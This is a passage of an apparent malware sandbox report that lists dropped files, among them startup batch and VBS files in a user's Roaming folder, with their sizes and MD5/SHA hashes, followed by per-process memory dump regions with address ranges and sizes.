                                                                                                              SHA256

                                                                                                              d0c4045c70a0822806a4e56d7883821cd2c19362f1cfed3bcbdb1e1b8eb15234

                                                                                                              SHA512

                                                                                                              de9dce8300656cd8531569011d043373193cbda125b738e66a5bf107178b48781d6dc88eea696b2074c352a1bf56a4693cfae62e668993ac24ce18aebfdcd684

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uaca0e0v.naw.ps1
                                                                                                              Filesize

                                                                                                              1B

                                                                                                              MD5

                                                                                                              c4ca4238a0b923820dcc509a6f75849b

                                                                                                              SHA1

                                                                                                              356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                              SHA256

                                                                                                              6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                              SHA512

                                                                                                              4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                            • C:\Users\Admin\AppData\Roaming\startup_str_80.bat
                                                                                                              Filesize

                                                                                                              1002KB

                                                                                                              MD5

                                                                                                              f6d5bfaee8a55ff72c7b453fda066d62

                                                                                                              SHA1

                                                                                                              7d737d53013990e5d05076b7206e43eb4793fc7f

                                                                                                              SHA256

                                                                                                              3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308

                                                                                                              SHA512

                                                                                                              e300c15bef9e898e7abd4ecf6759c0e60829e8d9b507e257359b0c0342c56d56adf7924c76ffbbee4c42e1b1ea229b7032d177849d2668720090780190b7f284

                                                                                                            • C:\Users\Admin\AppData\Roaming\startup_str_80.vbs
                                                                                                              Filesize

                                                                                                              114B

                                                                                                              MD5

                                                                                                              ed6727914bd82e63738b7a4baecf0b48

                                                                                                              SHA1

                                                                                                              657c99505d822abb6de7108cb7ab51bfbf38fbb7

                                                                                                              SHA256

                                                                                                              7c431d1125251cb53943087030e0e65bc471ab22189f76acd1c777d1de1a3e93

                                                                                                              SHA512

                                                                                                              3c3066fa86be1ddc071f530688b6aabd17381e26c0634c194fabe337aef8451895636b05aab5289bb43116ff766ad003f9b6d7113c29fab5e9f684245a602f4d

                                                                                                            • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                              Filesize

                                                                                                              412B

                                                                                                              MD5

                                                                                                              21434a6e0879ba69a3d5695caeb379f2

                                                                                                              SHA1

                                                                                                              dc3a820d6c76ee3c64fb6213a31f994c134ae2eb

                                                                                                              SHA256

                                                                                                              d80f9678371be63e696eec0d984fdb535f3594b4c0d83bb8ad4bdceb9606e133

                                                                                                              SHA512

                                                                                                              25a63ccc05e549490cbeeebc8f87123d13b34011c787b7d7553dbb5a08e77a2732728f4816c02b971bd52c3503f47f93fc504c4ff3acae311bb3281c5c733c5a

                                                                                                            • memory/212-231-0x000001F2DB7C0000-0x000001F2DB7E2000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/212-263-0x000001F2F3CC0000-0x000001F2F3CEA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/212-234-0x000001F2F3D30000-0x000001F2F3DA6000-memory.dmp
                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/212-264-0x00007FFE4AA30000-0x00007FFE4AC0B000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/212-265-0x00007FFE49E40000-0x00007FFE49EEE000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/584-283-0x000001DD6DAC0000-0x000001DD6DAEA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/584-288-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/584-280-0x000001DD6DA90000-0x000001DD6DAB5000-memory.dmp
                                                                                                              Filesize

                                                                                                              148KB

                                                                                                            • memory/584-281-0x000001DD6DAC0000-0x000001DD6DAEA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/584-287-0x000001DD6DAC0000-0x000001DD6DAEA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/636-298-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/636-297-0x00000237BE0C0000-0x00000237BE0EA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/636-292-0x00000237BE0C0000-0x00000237BE0EA000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/744-302-0x0000023564000000-0x000002356402A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/744-307-0x0000023564000000-0x000002356402A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/744-308-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/752-225-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/752-8-0x0000000008190000-0x00000000081F6000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/752-3-0x0000000007170000-0x00000000071A6000-memory.dmp
                                                                                                              Filesize

                                                                                                              216KB

                                                                                                            • memory/752-5-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/752-15-0x0000000008870000-0x00000000088E6000-memory.dmp
                                                                                                              Filesize

                                                                                                              472KB

                                                                                                            • memory/752-4-0x00000000077E0000-0x0000000007E08000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.2MB

                                                                                                            • memory/752-6-0x0000000007760000-0x0000000007782000-memory.dmp
                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/752-14-0x0000000008B10000-0x0000000008B5B000-memory.dmp
                                                                                                              Filesize

                                                                                                              300KB

                                                                                                            • memory/752-31-0x000000000AF70000-0x000000000B5E8000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.5MB

                                                                                                            • memory/752-32-0x00000000096A0000-0x00000000096BA000-memory.dmp
                                                                                                              Filesize

                                                                                                              104KB

                                                                                                            • memory/752-26-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/752-9-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/752-34-0x000000000A970000-0x000000000AA62000-memory.dmp
                                                                                                              Filesize

                                                                                                              968KB

                                                                                                            • memory/752-2-0x000000007315E000-0x000000007315F000-memory.dmp
                                                                                                              Filesize

                                                                                                              4KB

                                                                                                            • memory/752-33-0x0000000009670000-0x0000000009678000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/752-13-0x0000000008000000-0x000000000801C000-memory.dmp
                                                                                                              Filesize

                                                                                                              112KB

                                                                                                            • memory/752-35-0x000000000D5F0000-0x000000000DAEE000-memory.dmp
                                                                                                              Filesize

                                                                                                              5.0MB

                                                                                                            • memory/752-10-0x0000000008200000-0x0000000008550000-memory.dmp
                                                                                                              Filesize

                                                                                                              3.3MB

                                                                                                            • memory/752-7-0x0000000007F40000-0x0000000007FA6000-memory.dmp
                                                                                                              Filesize

                                                                                                              408KB

                                                                                                            • memory/900-317-0x000002D90C250000-0x000002D90C27A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/900-318-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/900-312-0x000002D90C250000-0x000002D90C27A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/992-327-0x0000027F13D60000-0x0000027F13D8A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/992-322-0x0000027F13D60000-0x0000027F13D8A000-memory.dmp
                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/992-328-0x00007FFE0AAC0000-0x00007FFE0AAD0000-memory.dmp
                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2496-275-0x00007FFE4AA30000-0x00007FFE4AC0B000-memory.dmp
                                                                                                              Filesize

                                                                                                              1.9MB

                                                                                                            • memory/2496-277-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2496-267-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2496-266-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2496-271-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2496-269-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2496-276-0x00007FFE49E40000-0x00007FFE49EEE000-memory.dmp
                                                                                                              Filesize

                                                                                                              696KB

                                                                                                            • memory/2496-268-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/2644-223-0x0000000000750000-0x00000000007BC000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/4304-205-0x000000000A830000-0x000000000A89C000-memory.dmp
                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/4304-226-0x0000000006EC0000-0x0000000006ED2000-memory.dmp
                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/4304-235-0x00000000093E0000-0x000000000941E000-memory.dmp
                                                                                                              Filesize

                                                                                                              248KB

                                                                                                            • memory/4304-206-0x000000000A960000-0x000000000A9F2000-memory.dmp
                                                                                                              Filesize

                                                                                                              584KB

                                                                                                            • memory/4304-243-0x0000000009490000-0x000000000949A000-memory.dmp
                                                                                                              Filesize

                                                                                                              40KB

                                                                                                            • memory/4460-72-0x0000000009BE0000-0x0000000009C85000-memory.dmp
                                                                                                              Filesize

                                                                                                              660KB

                                                                                                            • memory/4460-159-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4460-74-0x0000000009D90000-0x0000000009E24000-memory.dmp
                                                                                                              Filesize

                                                                                                              592KB

                                                                                                            • memory/4460-73-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4460-167-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4460-65-0x000000006FD30000-0x000000006FD7B000-memory.dmp
                                                                                                              Filesize

                                                                                                              300KB

                                                                                                            • memory/4460-67-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4460-66-0x0000000009A40000-0x0000000009A5E000-memory.dmp
                                                                                                              Filesize

                                                                                                              120KB

                                                                                                            • memory/4460-64-0x0000000009A60000-0x0000000009A93000-memory.dmp
                                                                                                              Filesize

                                                                                                              204KB

                                                                                                            • memory/4460-47-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4460-46-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB

                                                                                                            • memory/4460-45-0x0000000073150000-0x000000007383E000-memory.dmp
                                                                                                              Filesize

                                                                                                              6.9MB